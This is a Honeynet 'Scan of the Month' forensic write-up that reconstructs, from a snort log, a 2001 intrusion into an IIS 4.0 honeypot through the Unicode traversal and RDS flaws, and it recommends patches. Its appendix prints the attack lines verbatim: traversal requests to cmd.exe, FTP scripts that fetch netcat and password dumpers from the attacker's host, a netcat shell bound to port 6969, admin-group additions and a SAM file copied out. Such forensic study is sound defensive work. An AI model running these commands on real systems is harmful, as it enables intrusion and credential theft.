Jon McKnight

[email protected]

 

Scan 14

The Challenge:

On 4 Feb. 2001, the system 213.116.251.162 successfully attacked and compromised the honeypot 172.16.1.106, otherwise known as lab.wiretrip.net. We have reason to believe that the attacker knew this was a honeypot, however we decided to release this challenge as it examplifies the most common of NT attacks found in the wild. Your only source of information is the snort binary log file that captured the entire attack. You can download this in (.gz format, MD5=af1588ce7f7798190694addef3f148f7), or (.zip format, MD5=aca62e19ba49546d2bfd1fa1c71b5751). You will have to extract and analyze the information from this binary log file. Remember, entries will not only be judge on your answers, but how easy they are to read, and if you show how you obtained/conducted your analysis.

 

1.Which exploit(s) were used to attack the system?

 

Unicode and RDS

 

2.How were the exploits used to access and control the system?

 

First he verified that it was Unicode vulerable then RDS.  He tried to use RDS to create an ftp file that contained username, password and files (pdump.exe, samdump.exe, and nc.exe) that he wanted to download from a remote server.  Everything worked correctly except that he had the wrong password for the ftp server.  He could not see this so he assumed something was wrong. 

He attempts an ftp connection to his own machine, this works.  Next he tried to create and execute the ftp file via Unicode and it worked.  Now he used Unicode to issue a command to the lab.wiretrip.net box to copy cmd.exe and rename it cmd1.exe.  Then he used Unicode to bind cmd.exe to port 6969 with netcat.  I am somewhat puzzled why he did this through Unicode as netcat will only be running as IUSR_machine.  It would have been much less time consuming to use RDS to issue the netcat command. 

 

3.What was done once access was gained?

 

Johna used RDS to issue the pdump command.  The output was piped to a file.  This did not work however.  At this time Johna also had an IUSER_machine level connection to lab.wiretrip.net via netcat.  He issued a net users command via RDS, piped the output to a file and then viewed the contents via his Unicode netcat connection.  He then adds a README.NOW.Hax0r file in an effort to alert the admin to patch the server.

 

Next Johna attempts to add the IUSR_Kenny account and the IWAM_Kenny account to the admin group.  This will give Johna’s Unicode netcat connection administratives rights and allow him to view things like the sam._ file.

 

Now that his netcat connection is admin level he issues the net start command to see what services are running.  Johna now attempts to add a user called testuser with the password UgotHacked.  He is unsuccessful so he decides to update the sam._ file (using rdisk).  He first tried this command from the netcat connection but that did not seem to work so he tries RDS.  After a few tries it seems to work.  Once the file is updated he then copies it to the C:\ dir into a file called har.txt.  He loses his connection and reconnects.  After verifying that the file has been successfully copied he then copies har.txt to wwwroot and views har.txt from his web browser.  It is safe to assume that he copies the file into L0phtCrack and starts cracking the administrator password.

 

Twelve minutes later the gig is up, Johna figures out it is a honeypot.  My guess is that the administrator’s password has been cracked and it gives him his clue.  I would add that clue to the fact that one of RFP’s boxes is vulnerable to two exploits that he has received much press for (creating the msadc2.pl script and researching Unicode).

 

He changes IWAM_Kenny’s password to Snake69Snake69.  He deletes har.txt from the wwwroot directory and apparently tells his friends on IRC to check out a box that he has hacked.  This would flood the snort log (which it has done) and make it harder to sift through the data.  I think he has mentioned that it is both Unicode and RDS vulnerable because a different box connects.  This Linux box creates a file called test.txt using RDS.  The contents of the file are “this can’t be true”.

 

I notice a bunch of different connections looking at the test.txt.  This provides more evidence to the fact that he is communicating with friends over IRC.  The Linux box seems to have told everyone else.

 

Johna creates a new ftp file, this time he wants to have lab.wiretrip.net send him whisker.tar.gz.  While Johna was getting whisker, another nc connection was made to lab.wiretrip.net.  It is possible this is Johna reconnecting, but at this point we cannot verify with the data that we have since we know other people are aware of the vulnerabilities.

 

Johna’s last action before the snort log ends is to delete the ftp file that he placed on the server earlier.

 

4.How could this attack been prevented?

 

Applying the patches for Unicode and RDS

 

MS00-057 ("File permission canonicalization") for Unicode

http://www.microsoft.com/security/bulletins/MS99-025faq.asp for RDS

 

 

5.How much time did you spend on this analysis and writeup?

 

14 hours

 

Bonus Question:

Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not?

Yes

At approximately 13:23 GMT Johna issues the following command

 

echo best honeypot i've seen till now :) > rfp.txt

 

It seems he has figured out this was a honeypot.  One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that it's owner (RFP) developed.  RFP also researched the Unicode exploit.  I don't think it became apparent to Johna until around the time he issued the honeypot quote.  I say this because he makes some other files like

 

Johna realized this was a honeypot after he had copied the current password file.  It is possible that he cracked the password for the users on lab.wiretrip.net and one of the cracked passwords may have tipped him off.

 


Appendix

 

Notes I made from the Snort log

 

 

 

 

 

 

 

 

 

 

 

 

 


Looks like they first tried Unicode to view the boot.ini file.  It seems they used a script to automatically check for this vulnerability.  There are so many out in the wild I have no idea which exact script.

 

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

 

GET /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../boot.ini HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..À¯../boot.ini HTTP/1.1

 

It seems the box is vulnerable.  Success at 12:24:18

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 12:24:18 GMT

Content-Type: text/html

Cache-control: private

Transfer-Encoding: chunked

 

 

[boot loader]

timeout=30

default=multi(0)disk(0)rdisk(0)partition(1)\WINNT

[operating systems]

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00" 

multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise Edition Version 4.00 [VGA mode]" /basevideo /sos 

 


The next exploit seems to be RFP's RDS exploit (msadc2.pl).  I think the unicode and rds exploits are seperate scripts.  I don't think the intruder has modified them in that sense.  I base this off of the fact that 1 minute 13 seconds goes by before the intruder attempts RDS.

 

GET /msadc/ HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword,

application/vnd.ms-powerpoint, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD

HTTP/1.1 403 Access Forbidden

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 12:25:31 GMT

Connection: close

Content-Type: text/html

Content-Length: 172

 

A professor once told me that written code is like a fingerprint.  Looking at the snot log and then looking at the code in msadc2.pl I know that the snort log is showing me msadc2.pl being run.

 

Snort Log:

 

ADCClientVersion:01.06

Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

 

--!ADM!ROX!YOUR!WORLD!

Content-Type: application/x-varg

Content-Length: 366

 

msadac2.pl snippet:

 

ADCClientVersion:01.06

Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3

 

--!ADM!ROX!YOUR!WORLD!

Content-Type: application/x-varg

Content-Length: $reqlen

 

 

First the intuder tests to see if the exploit works.  He creates a file called fun with the word "werd" in it, in the C:\ directory.

 

c m d   / c   e c h o   w e r d   > >   c : \ f u n

Date: Sun, 04 Feb 2001 12:26:03 GMT

 

Now the inrtuder checks to see if the file has been created.  The intruder uses the Unicode vulnerability to check.  Looking at this signature again verifies that the intruder is using a Unicode script (well it doesn't verify 100%, but I have great certainty).

 

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../fun HTTP/1.1

 

GET /guest/default.asp/..À¯../.../..%C0%AF../..%C0%AF../fun HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..%AF../..%C0%AF../fun HTTP/1.1

 

GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1

 

 

It seems the file is there because "werd" is printed out below.  This means the server is vulnerable to RDS.

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 12:26:11 GMT

Content-Type: text/html

Cache-control: private

Transfer-Encoding: chunked

 

werd

 


Now the intruder is going to create a file (called ftpcom) on the server that contains the login information for an account that the intruder wants the server to connect.  Once connected the server will download samdump.dll, pdump.exe (pdump.exe requires samdump.dll to run), and nc.exe.

 

c m d   / c   e c h o   u s e r   j o h n a 2 k   >   f t p c o m

Date: Sun, 04 Feb 2001 12:31:47 GMT

 

c m d   / c   e c h o   h a c k e r 2 0 0 0   > >   f t p c o m

Date: Sun, 04 Feb 2001 12:31:54 GMT

 

c m d   / c   e c h o   g e t   s a m d u m p . d l l   > >   f t p c o m

Date: Sun, 04 Feb 2001 12:32:01 GMT

 

c m d   / c   e c h o   g e t   p d u m p . e x e   > >   f t p c o m

Date: Sun, 04 Feb 2001 12:32:08 GMT

 

c m d   / c   e c h o   g e t   n c . e x e   > >   f t p c o m

Date: Sun, 04 Feb 2001 12:32:15 GMT

 

c m d   / c   e c h o   q u i t   > >   f t p c o m

Date: Sun, 04 Feb 2001 12:32:22 GMT

 

 

Now the intruder wants to tell the server to ftp to another box that has the files that the intruder needs.  In this case the 

server the intruder wants to ftp to is www.nether.net.

 

c m d   / c   f t p   - s : f t p c o m   - n   w w w . n e t h e r . n e t

Date: Sun, 04 Feb 2001 12:32:29 GMT

 

Doh!  The intruder had a bad login.

 

220 freenet.nether.net FTP server (SunOS 5.7) ready.

USER johna2k

331 Password required for johna2k.

PASS hacker2000

530 Login incorrect.

PORT 172,16,1,106,12,64

530 Please login with USER and PASS.

RETR samdump.dll

530 Please login with USER and PASS.

RETR pdump.exe

530 Please login with USER and PASS.

RETR nc.exe

530 Please login with USER and PASS.

QUIT

221 Goodbye.

 

 

Not realizing that the FTP failed the intruder issues a command to run pdump and save the results in a file called new.pass. 

After creating this file the intruder wants the server to ftp this file to the intruder's server at www.nether.net

 

c m d   / c   p d u m p . e x e   > >   n e w . p a s s

Date: Sun, 04 Feb 2001 12:32:46 GMT

 

c m d   / c   e c h o   u s e r   j o h n a 2 k   >   f t p c o m 2

Date: Sun, 04 Feb 2001 12:32:56 GMT

 

c m d   / c   e c h o   h a c k e r 2 0 0 0   > >   f t p c o m 2

Date: Sun, 04 Feb 2001 12:33:03 GMT

 

c m d   / c   p u t   n e w . p a s s   > >   f t p c o m 2

Date: Sun, 04 Feb 2001 12:33:10 GMT

 

c m d   / c   e c h o   q u i t   > >   f t p c o m 2

Date: Sun, 04 Feb 2001 12:33:17 GMT

 

c m d   / c   f t p   - s : f t p c o m 2   - n   w w w . n e t h e r . n e t

Date: Sun, 04 Feb 2001 12:33:24 GMT

 

 

Doh!Doh! Bad login again, but the intruder still does not know.

 

220 freenet.nether.net FTP server (SunOS 5.7) ready.

USER johna2k

331 Password required for johna2k.

PASS hacker2000

530 Login incorrect.

QUIT

221 Goodbye.

 

 


Now the intruder has realized that something is wrong and decides to run another test.  The intruder tells the server to ftp to a different ftp server other than www.nether.net.  This time the ftp server is 213.116.251.162, which happens to be the intruder's own server.

 

c m d   / c   f t p   2 1 3 . 1 1 6 . 2 5 1 . 1 6 2

Date: Sun, 04 Feb 2001 12:33:43 GMT

 

The intruder (Johna) connects to his server,

 

--------H-A-C-K  T-H-E  P-L-A-N-E-T--------

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.

220-Featuring 100% elite hax0r [email protected]$#@

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------

 

 


Johna continues to have problems getting his ftp script to work.  At 12:39:58 GMT Johna uses his Unicode script to try and create the ftpcom file.

 

GET

/msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>ftpcom HTTP/1.1

 

 

Looks like this way works.

 

220--------H-A-C-K  T-H-E  P-L-A-N-E-T--------

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.

220-Featuring 100% elite hax0r [email protected]$#@

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------

USER johna2k

331 User name okay, need password.

PASS haxedj00

230 User logged in, proceed.

PORT 172,16,1,106,12,71

200 PORT Command successful.

RETR nc.exe

150 Opening ASCII mode data connection for nc.exe (59392 bytes).

 

 


Issues a command to copy cmd.exe to cmd1.exe using Unicode.

 

/msadc/..À¯../.../..%C0%AF../..%C0%AF../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1

 

 


Now he tells netcat to bind cmd.exe to port 6969

 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe

 

Success.  NOTE: he is connected as IUSR not Administrator

 

Microsoft(R) Windows NT(TM)

(C) Copyright 1985-1996 Microsoft Corp.

 

C:\Program Files\Common Files\system\msadc>

 

Now he looks to see if his files are there:

 

02/04/01  06:41a        <DIR>          .

02/04/01  06:41a        <DIR>          ..

09/25/97  07:41a                   596 adcjavas.inc

09/25/97  07:41a                   589 adcvbs.inc

04/30/97  11:00p               208,144 cmd1.exe

02/04/01  06:41a                    98 ftpcom

09/25/97  08:28a               172,816 msadce.dll

09/25/97  08:16a                 5,632 msadcer.dll

09/25/97  08:24a                23,312 msadcf.dll

09/25/97  08:24a                91,408 msadco.dll

09/25/97  08:19a                 5,120 msadcor.dll

09/26/97  08:19a                42,256 msadcs.dll

02/04/01  06:41a                59,392 nc.exe

02/04/01  06:41a                32,768 pdump.exe

10/02/97  07:28a                19,388 readme.txt

02/04/01  06:41a                36,864 samdump.dll

              16 File(s)        698,383 bytes

                          1,690,861,056 bytes free

 

C:\Program Files\Common Files\system\msadc>

 

 

pdump and samdump are there. So is cmd1.exe (which he copied earlier) and ftpcom.

 


Johna is excited so now he executes pdump using RDS and saves the output to a file called "yay.txt"

 

c m d   / c   C : \ P r o g r a m   F i l e s \ C o m m o n   F i l e s \ s y s t e m \ m s a d c \ p d u m p . e x e   > > y a y . t x t

Date: Sun, 04 Feb 2001 12:42:48 GMT

 

He deletes ftpcom and realizes that he needs to put the full path of pdump

 

c m d   / c   C : \ P r o g r a m   F i l e s \ C o m m o n   F i l e s \ s y s t e m \ m s a d c \ p d u m p . e x e   > >   c : \ y a y . t x t

Date: Sun, 04 Feb 2001 12:43:32 GMT

 

That didn't work so he looks around the c:\ directory of lab.wiretrip.net.

 

 


He issues a net users command via RDS and pipes the output to heh.txt. 

 

c m d   / c   n e t   u s e r s   > > c : \ h e h . t x t

Date: Sun, 04 Feb 2001 12:48:55 GMT

 

 

Using his Unicode netcat connection he checks to see if the file is there.

 

dir

 

Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\

 

11/26/00  12:34p                     0 AUTOEXEC.BAT

11/26/00  06:57p                   322 boot.ini

12/26/00  07:36p        <DIR>          exploits

02/04/01  06:48a                   263 heh.txt

12/07/00  03:30p        <DIR>          InetPub

12/07/00  03:12p        <DIR>          Multimedia Files

12/26/00  07:10p        <DIR>          New Folder

01/26/01  02:10p            78,643,200 pagefile.sys

12/21/00  08:59p        <DIR>          Program Files

12/21/00  08:59p        <DIR>          TEMP

02/04/01  06:48a        <DIR>          WINNT

12/26/00  07:09p        <DIR>          wiretrip

02/04/01  06:43a                     0 yay.txt

              14 File(s)     78,643,785 bytes

                          1,690,861,056 bytes free

 

Now he issues the type command via his Unicode netcat connection to see the contents of heh.txt

 

 

User accounts for \\

-------------------------------------------------------------------------------

Administrator            Guest                    IUSR_KENNY              

IWAM_KENNY             

 

The command completed with one or more errors.

 

 

 


He is kind enough to leave a file for the admin called README.NOW.Hax0r

 

echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r

 


He issues net group and net localgroup commands to obtain information about the groups on lab.wiretrip.net

 

He tries to add IWAM_KENNY to localgroup as a domain admin

 

c m d   / c   n e t   l o c a l g r o u p   D o m a i n   A d m i n s   I U S R _ K E N N Y   / A D D

Date: Sun, 04 Feb 2001 12:52:58 GMT

 

 

After a couple of unsuccessful tries he is able to add IUSR_KENNY and IWAM_KENNY as domain admins.

 

c m d   / c   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   I U S R _ K E N N Y   / A D D

Date: Sun, 04 Feb 2001 12:55:00 GMT

 

c m d   / c   n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   I W A M _ K E N N Y   / A D D

Date: Sun, 04 Feb 2001 12:55:12 GMT

 

 

 

Issuing the 'net localgroup administrators' command he is able to see that that IUSR_KENNY and IWAM_KENNY are now both admins.

 

Alias name     administrators

Comment        Members can fully administer the computer/domain

 

Members

-------------------------------------------------------------------------------

Administrator            Domain Admins            IUSR_KENNY               

IWAM_KENNY              

The command completed successfully.

 


After looking around some more he issues the net start command to see what services are running on the box

 

net start

These Windows NT services are started:

   Alerter

   Computer Browser

   EventLog

   FTP Publishing Service

   IIS Admin Service

   License Logging Service

   Messenger

   MSDTC

   Net Logon

   NT LM Security Support Provider

   Plug and Play

   Protected Storage

   Remote Procedure Call (RPC) Locator

   Remote Procedure Call (RPC) Service

   Server

   Spooler

   TCP/IP NetBIOS Helper

   Workstation

   World Wide Web Publishing Service

 

The command completed successfully.

 

 

 


Now he tries to add a user name testeruser with the password UgotHacked.

 

c m d   / c   n e t   u s e r   t e s t u s e r   U g o t H a c k e d   / A D D

Date: Sun, 04 Feb 2001 12:57:58 GMT

 

Next he tries to make testuser a member of localgroup and tries to make him an administrator.

 

c m d   / c   n e t   l o c a l g r o u p   A d m i n i s t r a t o r s   t e s t u s e r   / A D D

Date: Sun, 04 Feb 2001 12:58:13 GMT

 

But these commands did not work and he spends some time trying to find out why.  He gives u.

 


He goes to the winnt repair directory and issues the rdisk command to update the sam._ file. 

 

c m d   / c   r d i s k   - / s

Date: Sun, 04 Feb 2001 13:05:27 GMT

 

c m d   / c   r d i s k   - s

Date: Sun, 04 Feb 2001 13:05:33 GMT

 

c m d   / c   r d i s k

Date: Sun, 04 Feb 2001 13:05:38 GMT

 

Using netcat he checks to see if the sam._ file has been update.  The file’s date has not changed which means the file has not been updated.

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\WINNT\repair

 

02/04/01  07:05a        <DIR>          .

02/04/01  07:05a        <DIR>          ..

02/04:}Sä

10/13/96  07:38p                   438 autoexec.nt

11/26/00  12:34p                 2,510 config.nt

11/26/00  06:43p                15,677 default._

11/26/00  06:43p                14,946 ntuser.da_

11/26/00  06:43p                 4,593 sam._

11/26/00  06:43p                 6,066 security._

11/26/00  06:54p                50,405 setup.log

11/26/00  06:43p               124,776 software._

              11 File(s)      1,046,803 bytes

                          1,690,111,488 bytes free

 

 

He reissues the rdisk commands

 

c m d   / c   r d i s k

Date: Sun, 04 Feb 2001 13:06:00 GMT

 

c m d   / c   r d i s k   - s /

Date: Sun, 04 Feb 2001 13:06:06 GMT

 

c m d   / c   r d i s k   / s –

Date: Sun, 04 Feb 2001 13:06:28 GMT

 

He checks to see if this worked.  Sam._ has not been updated but ntuser.da_ has been updated.  At least something is working.

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\WINNT\repair

 

02/04/01  07:06a        <DIR>          .

02/04/01  07:06a        <DIR>          ..

10/13/96  07:38p                   438 autoexec.nt

11/26/00  12:34p                 2,510 config.nt

11/26/00  06:43p                15,677 default._

02/04/01  07:06a                14,946 ntuser.da_

11/26/00  06:43p                 4,593 sam._

11/26/00  06:43p                 6,066 security._

11/26/00  06:54p                50,405 setup.log

02/04/01  07:05a               177,732 system._

              11 File(s)      3,741,679 bytes

                          1,687,127,552 bytes free

 

 

 

 

Try, try, try again

 

c m d   / c   r d i s k   / s –

Date: Sun, 04 Feb 2001 13:06:46 GMT

 

 

Success!  My guess is that this was the first time rdisk was run on this machine and it took a while to update.  I think one of his original commands worked, but he wasn’t paient.

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\WINNT\repair

 

02/04/01  07:06a        <DIR>          .

02/04/01  07:06a        <DIR>          ..

10/13/96  07:38p                   438 autoexec.nt

11/26/00  12:34p                 2,510 config.nt

11/26/00  06:43p                15,677 default._

02/04/01  07:06a                14,946 ntuser.da_

11/26/00  06:43p                 4,593 sam._

11/26/00  06:43p                 6,066 security._

11/26/00  06:54p                50,405 setup.log

02/04/01  07:05a               177,732 system._

              11 File(s)      3,741,679 bytes

                          1,686,932,480 bytes free


After he does this he uses type to copy the contents of the sam._ file into a file called har.txt. 

 

c m d   / c   t y p e   c : \ w i n n t \ r e p a i r \ s a m . _   > > c : \ h a r . t x t

Date: Sun, 04 Feb 2001 13:07:32 GMT

 

He verifies the file is there

 

dir

 Volume in drive C has no label.

 Volume Serial Number is 8403-6A0E

 

 Directory of C:\

 

11/26/00  12:34p                     0 AUTOEXEC.BAT

11/26/00  06:57p                   322 boot.ini

11/26/00  12:34p                     0 CONFIG.SYS

12/26/00  07:36p        <DIR>          exploits

02/04/01  07:07a                 5,327 har.txt

12/07/00  03:30p        <DIR>          InetPub

12/07/00  03:12p        <DIR>          Multimedia Files

12/26/00  07:10p        <DIR>          New Folder

01/26/01  02:10p            78,643,200 pagefile.sys

12/21/00  08:59p        <DIR>          Program Files

02/04/01  06:49a                    69 README.NOW.Hax0r

12/21/00  08:59p        <DIR>          TEMP

02/04/01  07:05a        <DIR>          WINNT

12/26/00  07:09p        <DIR>          wiretrip

02/04/01  06:43a                     0 yay.txt

              15 File(s)     78,648,918 bytes

                          1,689,455,616 bytes free

 

 

 

 

 

 

 


He then copied har.txt to wwwroot. 

 

 

C:\InetPub\wwwroot>copy c:\har.txt

        1 file(s) copied.

 

 

 

 

 

Next he views har.txt from his web browser (I assume he copies it to his machine and runs L0phtCrack).

 

 

GET /har.txt HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:11:28 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:07:33 GMT

ETag: "5063fd6fab8ec01:b85"

Content-Length: 5327
At approximately 13:23 GMT Johna issues the following command

 

echo best honeypot i've seen till now :) > rfp.txt

 

It seems he has figured out this was a honeypot.  One of the most obvious reasons to me would be that lab.wiretrip.net is vulnerable to an exploit (RDS) that it's owner (RFP) developed.  RFP also researched the Unicode exploit. 

 


After looking around for a while, Johna changes IWAM_KENNY's password to Snake69Snake69

 

c m d   / c   n e t   u s e r   I W A M _ K E N N Y   S n a k e 6 9 S n a k e 6 9

Date: Sun, 04 Feb 2001 13:33:07 GMT

 


Someone issues the command

 

echo this can't be true > test.txt

 

Then this person issues the type command to verify the data is in the file.

 

I dont think this is Johna b/c this person is running linux 2.4.1.  I know that this is the person who created the test.txt file b/c they request that from their web browser.

 

GET /test.txt HTTP/1.0

If-Modified-Since: Sun, 04 Feb 2001 13:33:15 GMT; length=7

Connection: Keep-Alive

User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.1 i686)

Pragma: no-cache

Host: lab.wiretrip.net

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:34:58 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

Johna's web browser looks like this

 

GET /win2k.gif HTTP/1.1

Accept: */*

Referer: http://lab.wiretrip.net/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

If-Modified-Since: Sat, 16 Dec 2000 00:36:10 GMT

If-None-Match: "0796d2ff866c01:b85"

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; Hotbar 2.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

Cookie: ASPSESSIONIDGQQGGQZK=LPGNFIPAECCHCHMAFOIKAOEB

 

 

 


Now Johna is requesting the test.txt file from his original Win2k box.  Maybe he told friends on IRC to check out the box.  This would flood the snort log (which it has done) and make it harder to sift through the data.

 

GET /test.txt HTTP/1.1

Host: lab.wiretrip.net

Connection: keep-alive

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*

Accept-Language: en-gb

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

Via: 1.1 cache-haw (NetCache NetApp/5.0D13)

X-Forwarded-For: 194.117.146.52

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:37:06 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

 

Now here is another request from another box

 

GET /test.txt HTTP/1.0

User-Agent: Mozilla/4.7 [en] (Win98; I)

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

Via: 1.0 cache3.estpak.ee:8080 (Squid/2.3.STABLE3)

X-Forwarded-For: 213.168.4.30

Host: lab.wiretrip.net

Cache-Control: max-age=259200

Connection: keep-alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Connection: keep-alive

Date: Sun, 04 Feb 2001 13:37:15 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

Another request

 

GET /test.txt HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, */*

Accept-Language: nl

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)

Host: lab.wiretrip.net

Connection: Keep-Alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:38:07 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

 

Another request

 

GET /test.txt HTTP/1.0

Connection: Keep-Alive

User-Agent: Mozilla/4.61 [en] (X11; I; Linux 2.2.16 i686)

Host: lab.wiretrip.net

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: en

Accept-Charset: iso-8859-1,*,utf-8

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Connection: keep-alive

Date: Sun, 04 Feb 2001 13:38:51 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

Another request

 

GET /test.txt HTTP/1.0

Host: lab.wiretrip.net

Accept: text/html, text/plain, text/sgml, */*;q=0.01

Accept-Encoding: gzip, compress

Accept-Language: en

User-Agent: Lynx/2.8.3rel.1 libwww-FM/2.14

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:41:54 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

Another request this time the language is French

GET /test.txt HTTP/1.1

Accept: */*

Accept-Language: fr

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)

Host: lab.wiretrip.net

Connection: Keep-Alive

 

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 13:43:39 GMT

Content-Type: text/plain

Accept-Ranges: bytes

Last-Modified: Sun, 04 Feb 2001 13:34:22 GMT

ETag: "f0eff02eaf8ec01:b85"

Content-Length: 21

 

this can't be true

 

 

There is no way Johna has this many boxes.  The request times are very close together which makes me believe this is a coordinated effort.  I would bet that he has informed his friends on IRC.

 


Johna creates a new ftpcom file, identical to the one that he created and deleted an hour earlier.  The only difference is that he tells lab.wiretrip.net to upload wisker.tar.gz to his own box at 213.116.251.162.

 

GET

/msadc/..À¯../..À¯../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+put+c:\wiretrip\whisker.tar.gz+>>ftpcom HTTP/1.1

 

Now he tells lab.wiretrip.net to ftp

 

220--------H-A-C-K  T-H-E  P-L-A-N-E-T--------

220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.

220-Featuring 100% elite hax0r [email protected]$#@

220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.

220 -------H-A-C-K  T-H-E  P-L-A-N-E-T--------

USER johna2k

331 User name okay, need password.

PASS haxedj00

230 User logged in, proceed.

PORT 172,16,1,106,12,87

200 PORT Command successful.

STOR whisker.tar.gz

150 Opening ASCII mode data connection for whisker.tar.gz.

226 Transfer complete.

QUIT

221 Buh bye, you secksi hax0r j00 :]

 

 

 


It is worth noting that during the download of whisker, somebody opened another nc connection to the box.  Johna has a Win2k running Mozilla/4.0, but it might be someone else logging in.

 

GET /msadc/..%C0%AF../..%C0%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe

HTTP/1.1

Accept: */*

